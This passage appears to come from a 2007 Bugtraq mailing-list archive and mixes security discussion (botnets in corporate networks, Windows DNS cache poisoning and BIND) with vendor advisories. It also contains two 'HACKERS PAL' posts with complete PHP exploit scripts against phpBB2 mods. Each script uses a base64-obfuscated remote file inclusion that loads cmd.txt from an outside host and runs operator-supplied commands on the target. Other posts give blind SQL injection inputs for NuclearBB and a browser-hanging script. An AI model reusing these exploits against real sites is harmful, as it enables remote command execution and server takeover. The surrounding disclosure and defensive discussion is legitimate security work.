Steven Adair wrote: Is this in anyway surprising? ... Surprising? Not really. ... I think we all know the answer is no. Many Fortune 500 companies have more employees than some ISPs have customers. And that means the corporates should be expected to be (as) botted? Should we really expect differently? Indeed we should. It's easy to compare numbers, but that's not the real story. Almost by definition an ISP has no administrative control of the computers its customers use to connect via its service. Corporates are totally different in this regard -- in fact, diametrically opposite. Corporates own and thus are responsible for the control of all the computers they attach to their LANs and should be responsible for the actions of all those machines. So, in answer to your question, yes, we definitiely should expect more -- a great deal more. Will they be perfect? Sadly, no; partly because of human fallibility and partly because too many of them take what seems to be your view -- controlling all this is a hopeless task so why even bother trying. And finally, I don't think SI's efforts show that any F500s are as bad as a typical ISP. SI is, however, showing that at least some F500s have lazy arse/stupid/otherwise incompetent admins and/or oversight procedures and/or policies driving the whole mess of their IT systems, and as a result the rest of us pay for their incompetence. Also, as a side note, I would like to add that just because SPAM is coming from a certain gateway does not necessarily mean that the machines on their network are infected. ... Did you read any of their reports fully? They don't assume that. They track the mail back behind the gateways and they know what forms of what spam are being sent through bot-nets because of other systems they run (honeypots, etc) and analysis they perform. ... We could assume this, but then again I would have to assume Microsoft's network is full of bots because I get SPAM originating from Hotmail.com. It might be logical and in many cases to assume this, but it's worth noting this may not be the case. And they made an obvious (or much more subtle) error like this where? Regards, Nick FitzGerald
Extreme PHPBB2 Remote File Inclusion
Hello,, EclipseBB Remote File Inclusion .. With exploit :) Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [EMAIL PROTECTED] Tested on 3.0 Pre Final And other Versions Should be infected /* Script info ## Mod Title: Extreme PHPBB 3.0 ## Mod Version: 3.0 Pre Final ## Author: danb00 (Demo: http://extremephpbb.com/forum) ## Description: A fully modded phpBB 2.0.11 */ Remote File include :- includes/functions.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt? includes/functions_portal.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt? Exploit: ?php /***/ /* Extreme PHPBB2 Command Execution Exploit */ /*By : HACKERS PAL [EMAIL PROTECTED]*/ /* Website : WwW.SoQoR.NeT */ /***/ error_reporting(0); ini_set(max_execution_time,0); Function get_page($url){if(function_exists(file_get_contents)){$contents=file_get_contents($url);}else{$fp=fopen($url,r);while($line=fread($fp,1024)){$contents=$contents.$line;}}return$contents;} Echo body bgcolor=\#00\ text=\#00FF00\\ntitleExtreme PHPBB2 Command Execution Exploit by : HACKERS PAL :: WwW.SoQoR.NeT ::/title\n\r.h2Extreme PHPBB2 Command Execution\n\r.h3By : HACKERS PAL [EMAIL PROTECTED].h3VisiT My Website [a href=\http://WwW.SoQoR.NeT\;WwW.SoQoR.NeT/a]\n\r; $expl=base64_decode(aW5jbHVkZXMvZnVuY3Rpb25zLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZXZpbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8=); $action=$_GET['action']; if($action == ) { echo form action=\$PHP_SELF?action=2\ method=\post\\n Web URL -- Example : http://localhost/Extreme\n br input type=\text\ name=\url\ style=\width:250\\n br br\n Command : br textarea name=\query\ cols=\70\ rows=\5\/textarea\n br\n br div align=\center\\n input type=\submit\ /div\n /form\n ; } else { $exploit=$_POST['url']./.$expl.cmd=.$_POST['query']; $page=get_page($exploit); if(!eregi(hacking attempt,$page)) { Echo h1 Command Successfully executed .. Result is/h1 $page br Thanks For Using This exploit .. Have Fun :)brbrbr; } } die(base64_decode(PGRpdiBhbGlnbj0iY2VudGVyIj4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj50PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjoKPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+CkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5ldmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPkw8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj4tPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4wMDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5oQTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmphPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5saSA8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkZGRkZGIj4sPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KRDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPnIuPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5FPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+eDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGU iPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+YUNrZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5wPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj4xZDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5OPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZXQgLAo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5CPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bGFjawo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+dHRhQzwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+azwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pbmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5hPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5uPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ICwKPC9mb250Pgo8Zm9u
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
I appreciate you replying, but I understand the Windows DNS attack well. I'm just wondering how and if BIND protects against the same attack, and if yes, how? Well, as the main vulnerability implies, a sane DNS cache wouldn't accept a record that wasn't requested. If I ask for A, and I get A and B back, and B isn't reasonably related to A, ignore B. I'm not saying BIND is sane, but from what I understand, in this case they got it right. The birthday attack is merely another vector to exploit the real problem. tim
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
Hi Roger, On 4/18/07, Roger A. Grimes [EMAIL PROTECTED] wrote: How does BIND stop this sort of attack? Can a BIND expert respond? I'm not a BIND expert but I can (hopefully) tell you what's happening. Basically, Windows 2000 SP3 automatically accepts all authority RRs (authoritative name servers) that are received in a DNS reply. So, if you have a DNS server running on Windows 2000 SP3 which is available from the Internet, and which supports recursive requests, all an attacker has to do is to issue a DNS request to your server, for a domain (and a DNS server) that he controls. Attacker's DNS server can add several authority RRs (they define authoritative nameservers) for TLDs, such as .com or .net and will effectively pollute your DNS cache. This can be fixed by applying SP4 or changing a registry item. However, it was later found that Windows 2000 DNS servers were still vulnerable if they were configured to forward DNS requests to another DNS server. So, the typical setup in most organization is: Windows DNS - forwarding to BIND If you have BIND v9, it will retrieve the reply but will not strip out authority RRs. BIND will send this back to the Windows DNS server which will happily cache everything, trusting BIND. In BIND v9 this was fixed because it will delete this (extra) data before sending the reply back to the Windows DNS server (that's why it's very important to upgrade your DNS servers to BIND v9). I'm not sure what's the story with other DNS servers (djbdns, for example). Cheers, Bojan
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
Hello Makoto, Thank you for the clarification, Tim. That is exactly what I wanted to say. :) By the way, as regards recent Bind 9, birthday attack is much more difficult to conduct because even if the attacker sends multiple simultaneous recursive queries, Bind 9 aggregates these queries. Aggregating queries would definitely help if you assume the attacker can make recursive queries. However, it was my understanding (which could be completely wrong) that BIND 9 reuses sockets for multiple queries, unlike previous versions, and this makes spoofed attacks easier in another respect. (Of course this all has nothing to do with the Windows-specific flaw.) In addition, there is a patch written by Jinmei-san for Bind 9.4.0 (current release) to randomize source ports. http://www.jinmei.org/bind-9.4.0-portpool.patch http://member.wide.ad.jp/tr/wide-tr-dns-bind9-portpool-01.txt (technical report from WIDE project in Japanese) That's good, that at least someone is trying to do this in BIND. thanks for the info, tim
Re: Linksys WAG200G - Information disclosure
A new 1.01.04 firmware for the Linksys WAG200G seems to correct this security problem. Firmware 1.01.04 (04/04/2007) : - Fixes issue with incorrect upstream/downstream transmit power display on DSL Connection page - Fixes issue with ATT VPN client not connecting to ATT VPN network - Fixes issue with Security information disclosure for UDP port scan packet
Re: Internet Explorer Crash
Yeah, it hung my Internet Explorer window, but right clicking on the task bar and clicking Close took care of it. No biggy.
[security bulletin] HPSBST02206 SSRT071354 rev.2 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS07-017
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00965724 Version: 2 HPSBST02206 SSRT071354 rev.2 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS07-017 NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-04-10 Last Updated: 2007-04-17 Potential Security Impact: Please check the table below Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA, please check the table in the Resolution section of this Security Bulletin. References: MS07-017 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Storage Management Appliance v2.1 Software running on: * Storage Management Appliance I * Storage Management Appliance II * Storage Management Appliance III BACKGROUND For a PGP signed version of this security bulletin please write to: [EMAIL PROTECTED] Patches released by Microsoft after MS06-051 are covered by monthly Security Bulletins For the full archived list of Microsoft security updates applicable for Storage Management Appliance software v2.1, please refer to the following Security Bulletins available on the IT Resource Center (ITRC) Web site: http://www.itrc.hp.com/service/cki/secBullArchive.do * For patches released by Microsoft in 2003, MS03-001 to MS03-051 refer to Security Bulletin HPSBST02146 * For patches released by Microsoft in 2004, MS04-001 to MS04-045 refer to Security Bulletin HPSBST02147 * For patches released by Microsoft in 2005, MS05-001 to MS05-055 refer to Security Bulletin HPSBST02148 * For patches released by Microsoft in 2006, MS06-001 to MS06-051 refer to Security Bulletin HPSBST02140 The Microsoft patch index archive and further details about all Microsoft patches can be found on the following Web site: http://www.microsoft.com/technet/security/bulletin/summary.mspx NOTE: The SMA must have all pertinent SMA Service Packs applied Windows 2000 Update Rollup 1 Customers are advised to download and install the Windows 2000 Update Rollup 1 for Service Pack 4 on SMA v2.1. For more information please refer to the Windows 2000 Update Rollup 1 for Service Pack 4 and Storage Management Appliance v2.1 advisory at the following website: http://h2.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?contentType=SupportManuallang=encc=usdocIndexId=179111taskId=101prodTypeId=12169prodSeriesId=315667 Windows 2000 Update Rollup 1 for SP4 does not include security updates released after April 30, 2005 starting from MS05-026. It also does not include patches MS04-003 and MS04-028. Please install these patches in addition to Windows 2000 Update Rollup 1 for SP4, if they have not been installed already RESOLUTION HP strongly recommends the immediate installation of all security patches that apply to third party software which is integrated with SMA software products supplied by HP, and that patches are applied in accordance with an appropriate patch management policy. NOTE: Patch installation instructions are shown at the end of this table. - MS Patch - MS07-017 Vulnerabilities in GDI Could Allow Remote Code Execution (925902) Analysis - Possible security issue exists. Patch will run successfully. Action - For SMA v2.1, customers should download patch from Microsoft and install. - Installation Instructions: (if applicable) Download patches to a system other than the SMA Copy the patch to a floppy diskette or to a CD Execute the patch by using Terminal Services to the SMA or by attaching a keyboard, monitor and mouse to the SMA. The Microsoft Windows Installer 3.1 is supported on SMA v2.1. For more information please refer at the following website: http://www.microsoft.com/downloads/details.aspx?FamilyID=889482fc-5f56-4a38-b838-de776fd4138chash=SYSSXDFdisplaylang=en PRODUCT SPECIFIC INFORMATION HISTORY Version: 1 (rev.1) - 10 April 2007 Initial release Version: 2 (rev.2) - 17 April 2007 Corrected MS patch # MS07-014 to MS07-017 Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as
Re: Internet Explorer Crash
Tested on several machines- max CPU went to 25, and IE came up asking if I wanted to stop the script in all cases. This is true of a default Vista install of IE 7 and XP Pro installs upgraded to IE 7. Scripting has to be on as well... Even on a dog computer, the prompt will come up (eventually). Non-issue here. t - Original Message - From: Tom Gregory [EMAIL PROTECTED] To: Thor (Hammer of God) [EMAIL PROTECTED] Cc: bugtraq@securityfocus.com Sent: Wednesday, April 18, 2007 9:12 AM Subject: Re: Internet Explorer Crash Actually Yes, the PoC crashing my IE, make it hang and my CPU usage goes to 100%, and i'm using Internet Explorer 7.0.5730.11 like he said. Tom Thor (Hammer of God) wrote: Actually, I just get a message that says A script on this page is causing Internet Explorer to run slowly. But my CPU usage for iexplore.exe is only at 20, and my system didn't slow down in the least. I went ahead and told IE to continue to run the script, and pops up again in a bit asking me the same thing. Finally bored, I say no and it immediately came up with Goodbye on the page. If this actually makes Safari and Konqueror crash, why the stop using Microsoft products recommendation? At least IE is smart enough to tell me that your little stupidInternetExploder script is being pesky. t - Original Message - From: J. Oquendo [EMAIL PROTECTED] To: bugtraq@securityfocus.com Sent: Tuesday, April 17, 2007 10:09 AM Subject: Internet Explorer Crash Product: Internet Explorer Version 7.0.5730.11 Impact: Browser crash possibly more Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' I. BACKGROUND Why bother? Who doesn't know what Internet Explorer and Microsoft are. II. DESCRIPTION IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash. III SOLUTION Stop using Microsoft products or deal with a new advisory every other day. IV. Proof http://www.infiltrated.net/stupidInternetExploder.html V. Code $ more /stupidInternetExploder.html script var reg = /(.)*/; var z = 'Z'; while (z.length = 999 99 99 99 99) z+=z; var boum = reg.exec(z); /script Goodbye J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams
RE: Re[2]: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
Thanks for responding. If this is the case, why is this report a report of a Windows DNS vulnerability, since it appears to be a DNS (or at least BIND and Windows) vulnerability? My guess is the original poster didn't include BIND in his test scope or something like that. Roger * *Roger A. Grimes, InfoWorld, Security Columnist *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada... *email: [EMAIL PROTECTED] or [EMAIL PROTECTED] *Author of Professional Windows Desktop and Server Hardening (Wrox) *http://www.amazon.com/gp/product/0764599909 * -Original Message- From: 3APA3A [mailto:[EMAIL PROTECTED] Sent: Tuesday, April 17, 2007 4:50 PM To: Roger A. Grimes Cc: Makoto Shiotsuki; bugtraq@securityfocus.com Subject: Re[2]: Windows DNS Cache Poisoning by Forwarder DNS Spoofing Dear Roger A. Grimes, DNS spoofing attack in general can not be 'patched', because this is a weakness of DNS protocol itself. As for birthday attack applicability, this problem was discussed in 2002. In 2003 problem still exist in both bind 8 and 9. According to CERT (US-CERT) as on 10/18/2004 bind was still vulnerable. As far as I remember, there never was a patch for bind to prevent this specific attack, yet it can be a part of some later bind release. A possible mitigation against birthday attacks (not against spoofing in general) on the server software level are any of: 1. Do no reuse source port for DNS requests. Have every request to be issued from different source ports (resource consumption attack is possible). 2. Keep a table of issued requests and do not issue request for the same name before response for previous one is received (can not be implemented in scalable 'multiple processes' DNS server architecture) 3. Monitor if multiple replies are received for a single request. I don't know if bind actually use any. Hope, this helps. --Tuesday, April 17, 2007, 8:48:04 PM, you wrote to [EMAIL PROTECTED]: RAG How does BIND stop this sort of attack? RAG Can a BIND expert respond? RAG Roger RAG * RAG *Roger A. Grimes, InfoWorld, Security Columnist *CPA, CISSP, MCSE: RAG Security (2000/2003/MVP), CEH, yada...yada... RAG *email: [EMAIL PROTECTED] or [EMAIL PROTECTED] *Author RAG of Professional Windows Desktop and Server Hardening (Wrox) RAG *http://www.amazon.com/gp/product/0764599909 RAG * RAG -Original Message- RAG From: Makoto Shiotsuki [mailto:[EMAIL PROTECTED] RAG Sent: Tuesday, April 17, 2007 12:31 PM RAG To: Roger A. Grimes RAG Cc: bugtraq@securityfocus.com RAG Subject: Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing One question. Is BIND any better at preventing this type of attack? RAG As far as I know, this vulnerability is specific to the Windows DNS. RAG Makoto Shiotsuki -- ~/ZARAZA http://securityvulns.com/
FullyModdedphpBB2 Remote File Inclusion
Hello,, FullyModdedphpBB2 Remote File Inclusion .. With exploit :) Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [EMAIL PROTECTED] /* Script info ## Mod Title: FullyModdedphpBB2 ## Description: A fully modded phpBB */ Remote File Include: subscp.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt? Exploit: ?php // /* Fully Moded PHPBB2 Command Execution Exploit */ /* By : HACKERS PAL [EMAIL PROTECTED]*/ /* Website : WwW.SoQoR.NeT */ // error_reporting(0); ini_set(max_execution_time,0); Function get_page($url){if(function_exists(file_get_contents)){$contents=file_get_contents($url);}else{$fp=fopen($url,r);while($line=fread($fp,1024)){$contents=$contents.$line;}}return$contents;} Echo body bgcolor=\#00\ text=\#00FF00\\ntitleFully Moded PHPBB2 Command Execution Exploit by : HACKERS PAL :: WwW.SoQoR.NeT ::/title\n\r.h2Fully Moded PHPBB2 Command Execution\n\r.h3By : HACKERS PAL [EMAIL PROTECTED].h3VisiT My Website [a href=\http://WwW.SoQoR.NeT\;WwW.SoQoR.NeT/a]\n\r; $expl=base64_decode(c3Vic2NwLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZXZpbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8=); $action=$_GET['action']; if($action == ) { echo form action=\$PHP_SELF?action=2\ method=\post\\n Web URL -- Example : http://localhost/FullyModed\n br input type=\text\ name=\url\ style=\width:250\\n br br\n Command : br textarea name=\query\ cols=\70\ rows=\5\/textarea\n br\n br div align=\center\\n input type=\submit\ /div\n /form\n ; } else { $exploit=$_POST['url']./.$expl.cmd=.$_POST['query']; $page=get_page($exploit); if(!eregi(hacking attempt,$page)) { Echo h1 Command Successfully executed .. Result is/h1 $page br Thanks For Using This exploit .. Have Fun :)brbrbr; } } die(base64_decode(PGRpdiBhbGlnbj0iY2VudGVyIj4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj50PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjoKPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+CkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5ldmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPkw8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj4tPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4wMDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5oQTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmphPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5saSA8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkZGRkZGIj4sPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KRDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPnIuPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5FPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+eDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGU iPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+YUNrZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5wPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj4xZDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5OPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZXQgLAo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5CPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bGFjawo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+dHRhQzwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+azwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pbmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5hPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5uPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ICwKPC9mb250Pgo8Zm9u dCBjb2xvcj0iI0ZGMDAwMCI+SjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPnJlPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPjxmb250IGNvbG9yPSIjRkYwMDAwIj4KQjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8L2ZvbnQ+PC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5naDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmRhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5EPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIj4KLCA8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnIgPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+YTwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+Y2s8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnI8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPgosPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+PGJyPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5TPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cDwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+ZWM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pYTwvZ
Re: [funsec] Re: [Full-disclosure] A Botted Fortune 500 a Day
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Nick FitzGerald [EMAIL PROTECTED] wrote: Steven Adair wrote: Also, as a side note, I would like to add that just because SPAM is coming from a certain gateway does not necessarily mean that the machines on their network are infected. ... Did you read any of their reports fully? They don't assume that. They track the mail back behind the gateways and they know what forms of what spam are being sent through bot-nets because of other systems they run (honeypots, etc) and analysis they perform. Indeed. Also, our (Trend Micro) analysis shows that virtually all spam these days is being sent by spambots. The guys at Support Intelligence (Rick and Adam)have done their homework. - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.6.1 (Build 1012) wj8DBQFGJVgcq1pz9mNUZTMRAjFHAKDenx2XP0pPphqwsUW9XymjQ7RU1ACghncX mqzhB1nidD8GjCoMbSkF27s= =zjJf -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawg(at)netzero.net ferg's tech blog: http://fergdawg.blogspot.com/
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
[Bojan Zdrnja] I'm not sure what's the story with other DNS servers (djbdns, for example). In regard to djbdns, I believe that that's answered at: http://cr.yp.to/djbdns/dnscache.html where it says: dnscache does not cache (or pass along) records outside the server's bailiwick; those records could be poisoned. Records for foo.dom, for example, are accepted only from the root servers, the dom servers, and the foo.dom servers. Regards, Matt
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities Vulnerable: NuclearBB Alpha 1 Google d0rk: This forum is powered by NuclearBB = String Inputs = login.php - $_POST['submit'] username=xyz password=passxyz submit=Login+and+1=0 register.php - $_POST['website'] [EMAIL PROTECTED] [EMAIL PROTECTED] pass1=passwordxyz pass2=passwordxyz [EMAIL PROTECTED]+and+1=0 [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over register_submit=Register register.php - $_POST['aol'] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]+and+1=0 [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over register_submit=Register -- register.php - $_POST['signature'] -- [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]+and+1=0 coppa_state=over register_submit=Register == Numeric Inputs == --- groups.php - $_GET['g'] --- http://www.example.com/groups.php?g=1+and+1=0 -- register.php - $_POST['email'] -- [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=overregister_submit=Register John Martinelli [EMAIL PROTECTED] http://john-martinelli.com April 18th, 2007
ZDI-07-015: Novell Groupwise WebAccess Base64 Decoding Stack Overflow Vulnerability
ZDI-07-015: Novell Groupwise WebAccess Base64 Decoding Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-015.html April 18, 2007 -- CVE ID: CVE-2007-2171 -- Affected Vendor: Novell -- Affected Products: Groupwise WebAccess -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since April 19, 2007 by Digital Vaccine protection filter ID 5295. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists in the GWINTER.exe process bound by default on TCP ports 7205 and 7211. During the handling of an HTTP Basic authentication request, the process copies user-supplied base64 data into a fixed length stack buffer. Sending at least 